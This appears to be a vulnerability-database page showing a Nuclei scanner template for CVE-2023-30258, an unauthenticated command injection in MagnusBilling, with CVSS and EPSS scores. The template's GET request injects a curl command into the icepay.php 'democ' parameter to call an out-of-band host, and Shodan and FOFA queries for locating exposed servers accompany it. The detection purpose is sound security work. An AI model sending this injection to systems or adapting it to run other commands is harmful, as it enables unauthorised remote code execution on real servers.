Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-30258
HistoryNov 23, 2023 - 6:35 a.m.

MagnusBilling - Unauthenticated Remote Code Execution

2023-11-2306:35:32
ProjectDiscovery
github.com
7
cve2023
packetstorm
magnusbilling
rce
oast
unauth

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.439 Medium

EPSS

Percentile

97.4%

Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
id: CVE-2023-30258

info:
  name: MagnusBilling - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: |
    Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30258
    - https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258
    - http://packetstormsecurity.com/files/175672/MagnusBilling-Remote-Command-Execution.html
    - https://github.com/magnussolution/magnusbilling7/commit/ccff9f6370f530cc41ef7de2e31d7590a0fdb8c3
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-30258
    cwe-id: CWE-78
    epss-score: 0.25604
    epss-percentile: 0.96696
    cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magnussolution
    product: magnusbilling
    shodan-query: http.html:"magnusbilling"
    fofa-query: body="magnusbilling"
  tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution

http:
  - method: GET
    path:
      - "{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a071fe2d4bc54efa5a79cba38c20d2fcd7bb69536fc983c156b52ca187615775022079222e249bf01f2e55a560999af2aaf0c538e1a05be8152114ca492a3deffbbf:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.439 Medium

EPSS

Percentile

97.4%